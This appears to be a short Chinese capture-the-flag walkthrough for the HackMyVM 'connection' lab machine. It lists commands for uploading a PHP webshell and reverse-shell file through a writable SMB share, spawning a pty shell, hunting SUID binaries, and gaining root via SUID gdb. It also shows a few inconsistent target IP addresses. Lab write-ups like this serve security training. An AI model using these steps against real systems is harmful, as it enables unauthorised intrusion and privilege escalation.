hackmyvm-connection
connection(利用445端口smb)
ubuntu:192.168.89.225(这里使用ubuntu代替centos7)
connection:192.168.89.47
kali:192.168.89.149
arp-scan -l
nmap -sS -v 192.168.36.47
nmap 192.168.89.47 --script vuln
使用nmap vuln扫描192.168.111.80靶机,观察可能存在的漏洞:
未发现漏洞,可以通过445(smb)端口入手
smbmap -H 192.168.89.47
有一个共享文件夹,尝试连接一下,这个目录看起来像之前的默认页面目录
smbclient \\\\192.168.89.47\\share
密码是kali攻击机的密码
查看当前目录,进入html目录,下载index.html到本地
就是刚才的那个默认页面,此目录应该就是web目录了
上传一句话木马
put shell.php
上传成功
连接蚁剑
第一个flag
上传 php-reverse-shell.php
GitCode - 全球开发者的开源社区,开源代码托管平台
which python
交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
搜索具备SUID权限的程序
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
find / -user root -perm -4000 -print 2>/dev/null
在 suid 二进制文件中,发现一个特殊文件
-rwsr-sr-x 1 root root 7.7M Oct 14 2019 /usr/bin/gdb
利用 gdb 进行提权
gdb | GTFOBins
提权成功
第二个flag